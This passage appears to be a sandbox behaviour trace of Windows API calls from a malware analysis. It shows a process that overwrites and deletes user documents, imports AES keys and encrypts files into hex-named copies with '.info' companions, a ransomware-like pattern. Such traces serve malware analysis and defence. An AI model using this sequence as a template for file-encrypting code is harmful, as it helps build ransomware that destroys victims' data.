lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0073.728] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.729] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0073.730] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0073.730] SetEndOfFile (hFile=0x36c) returned 1 [0073.731] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0073.731] CloseHandle (hObject=0x36c) returned 1 [0073.731] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", lpFilePart=0x0) returned 0x40 [0073.731] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0073.731] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fepsaid6dzqaar5swvy.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.731] GetFileType (hFile=0x36c) returned 0x1 [0073.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0073.731] GetFileType (hFile=0x36c) returned 0x1 [0073.731] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0073.731] CloseHandle (hObject=0x36c) returned 1 [0073.731] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", lpFilePart=0x0) returned 0x40 [0073.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0073.732] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fepsaid6dzqaar5swvy.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.732] GetFileType (hFile=0x36c) returned 0x1 [0073.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0073.732] GetFileType (hFile=0x36c) returned 0x1 [0073.732] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0073.732] CloseHandle (hObject=0x36c) returned 1 [0073.732] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", lpFilePart=0x0) returned 0x40 [0073.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0073.732] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fepsaid6dzqaar5swvy.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.732] GetFileType (hFile=0x36c) returned 0x1 [0073.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0073.732] GetFileType (hFile=0x36c) returned 0x1 [0073.732] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0073.732] CloseHandle (hObject=0x36c) returned 1 [0073.733] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", lpFilePart=0x0) returned 0x40 [0073.733] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fepsaid6dzqaar5swvy.xlsx")) returned 1 [0073.827] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", lpFilePart=0x0) returned 0x40 [0074.266] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\68C0515135DAEA384E9FDD44870A892E", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\68C0515135DAEA384E9FDD44870A892E", lpFilePart=0x0) returned 0x48 [0074.266] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0074.266] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\68C0515135DAEA384E9FDD44870A892E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\68c0515135daea384e9fdd44870a892e"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.266] GetFileType (hFile=0x36c) returned 0x1 [0074.266] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0074.266] GetFileType (hFile=0x36c) returned 0x1 [0074.266] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0074.266] CloseHandle (hObject=0x36c) returned 1 [0074.266] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\68C0515135DAEA384E9FDD44870A892E", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\68C0515135DAEA384E9FDD44870A892E", lpFilePart=0x0) returned 0x48 [0074.266] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0074.266] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\68C0515135DAEA384E9FDD44870A892E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\68c0515135daea384e9fdd44870a892e"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.266] GetFileType (hFile=0x36c) returned 0x1 [0074.267] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0074.267] GetFileType (hFile=0x36c) returned 0x1 [0074.267] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0074.267] CloseHandle (hObject=0x36c) returned 1 [0074.267] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\68C0515135DAEA384E9FDD44870A892E", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\68C0515135DAEA384E9FDD44870A892E", lpFilePart=0x0) returned 0x48 [0074.267] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0074.267] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\68C0515135DAEA384E9FDD44870A892E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\68c0515135daea384e9fdd44870a892e"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.267] GetFileType (hFile=0x36c) returned 0x1 [0074.267] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0074.267] GetFileType (hFile=0x36c) returned 0x1 [0074.267] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0074.267] CloseHandle (hObject=0x36c) returned 1 [0074.267] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", lpFilePart=0x0) returned 0x3f [0074.268] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", lpFilePart=0x0) returned 0x3f [0074.269] CryptAcquireContextW (in: phProv=0x1bf5da68, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5da68*=0x1a5b7710) returned 1 [0074.269] CryptImportKey (in: hProv=0x1a5b7710, pbData=0x21ecb08, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x1a626ad0) returned 1 [0074.269] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.269] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0074.269] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x21ecbf8, pdwDataLen=0x1bf5db30 | out: pbData=0x21ecbf8*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0074.270] CryptImportKey (in: hProv=0x1a5b7710, pbData=0x21ecd18, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626fa0) returned 1 [0074.270] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.270] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.270] CryptDuplicateKey (in: hKey=0x1a626fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626e50) returned 1 [0074.270] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.270] CryptSetKeyParam (hKey=0x1a626e50, dwParam=0x4, pbData=0x21ece60*=0x1, dwFlags=0x0) returned 1 [0074.270] CryptSetKeyParam (hKey=0x1a626e50, dwParam=0x1, pbData=0x21ece10, dwFlags=0x0) returned 1 [0074.270] CryptDestroyKey (hKey=0x1a626fa0) returned 1 [0074.270] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0074.270] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", lpFilePart=0x0) returned 0x3f [0074.270] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0074.270] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gsxuytargthmal4dufg.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.270] GetFileType (hFile=0x36c) returned 0x1 [0074.270] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0074.270] GetFileType (hFile=0x36c) returned 0x1 [0074.270] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BA089CAE47A022AD42AFC7573ED986A1", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BA089CAE47A022AD42AFC7573ED986A1", lpFilePart=0x0) returned 0x48 [0074.270] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0074.270] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BA089CAE47A022AD42AFC7573ED986A1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ba089cae47a022ad42afc7573ed986a1"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x380 [0074.271] GetFileType (hFile=0x380) returned 0x1 [0074.271] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0074.271] GetFileType (hFile=0x380) returned 0x1 [0074.271] ReadFile (in: hFile=0x36c, lpBuffer=0x21ed230, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x21ed230*, lpNumberOfBytesRead=0x1bf5da28*=0x14000, lpOverlapped=0x0) returned 1 [0074.273] CryptEncrypt (in: hKey=0x1a626e50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2201248*, pdwDataLen=0x1bf5da80*=0x14000, dwBufLen=0x14000 | out: pbData=0x2201248*, pdwDataLen=0x1bf5da80*=0x14000) returned 1 [0074.273] WriteFile (in: hFile=0x380, lpBuffer=0x2201248*, nNumberOfBytesToWrite=0x14000, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x2201248*, lpNumberOfBytesWritten=0x1bf5da18*=0x14000, lpOverlapped=0x0) returned 1 [0074.275] ReadFile (in: hFile=0x36c, lpBuffer=0x21ed230, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x21ed230*, lpNumberOfBytesRead=0x1bf5da28*=0xa53, lpOverlapped=0x0) returned 1 [0074.275] CryptEncrypt (in: hKey=0x1a626e50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2215288*, pdwDataLen=0x1bf5da80*=0xa50, dwBufLen=0xa50 | out: pbData=0x2215288*, pdwDataLen=0x1bf5da80*=0xa50) returned 1 [0074.275] ReadFile (in: hFile=0x36c, lpBuffer=0x21ed230, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x21ed230*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0074.275] CryptEncrypt (in: hKey=0x1a626e50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2216d30*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x2216d30*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0074.275] CryptEncrypt (in: hKey=0x1a626e50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2216d80*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x2216d80*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0074.275] WriteFile (in: hFile=0x380, lpBuffer=0x2215d18*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x2215d18*, lpNumberOfBytesWritten=0x1bf5d948*=0xa60, lpOverlapped=0x0) returned 1 [0074.275] CloseHandle (hObject=0x380) returned 1 [0074.277] CloseHandle (hObject=0x36c) returned 1 [0074.277] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0074.277] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0074.277] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0074.277] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BA089CAE47A022AD42AFC7573ED986A1", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BA089CAE47A022AD42AFC7573ED986A1", lpFilePart=0x0) returned 0x48 [0074.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0074.277] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BA089CAE47A022AD42AFC7573ED986A1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ba089cae47a022ad42afc7573ed986a1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.277] GetFileType (hFile=0x36c) returned 0x1 [0074.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0074.278] GetFileType (hFile=0x36c) returned 0x1 [0074.278] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.279] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.280] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.281] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.282] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.282] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.282] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.282] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.282] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.282] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.282] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.283] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.283] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.283] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.283] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.283] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.283] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.283] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.283] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.283] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.284] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0xa60, lpOverlapped=0x0) returned 1 [0074.284] ReadFile (in: hFile=0x36c, lpBuffer=0x22174b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22174b0*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0074.284] CloseHandle (hObject=0x36c) returned 1 [0074.285] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BA089CAE47A022AD42AFC7573ED986A1.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BA089CAE47A022AD42AFC7573ED986A1.info", lpFilePart=0x0) returned 0x4d [0074.285] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0074.285] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BA089CAE47A022AD42AFC7573ED986A1.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ba089cae47a022ad42afc7573ed986a1.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.286] GetFileType (hFile=0x36c) returned 0x1 [0074.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0074.286] GetFileType (hFile=0x36c) returned 0x1 [0074.286] WriteFile (in: hFile=0x36c, lpBuffer=0x2223b60*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x2223b60*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0074.287] CloseHandle (hObject=0x36c) returned 1 [0074.288] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", lpFilePart=0x0) returned 0x3f [0074.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0074.288] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gsxuytargthmal4dufg.odt"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5232660, ftCreationTime.dwHighDateTime=0x1d4d1c1, ftLastAccessTime.dwLowDateTime=0xeb2d8840, ftLastAccessTime.dwHighDateTime=0x1d4cb7c, ftLastWriteTime.dwLowDateTime=0xeb2d8840, ftLastWriteTime.dwHighDateTime=0x1d4cb7c, nFileSizeHigh=0x0, nFileSizeLow=0x14a53)) returned 1 [0074.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0074.288] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: 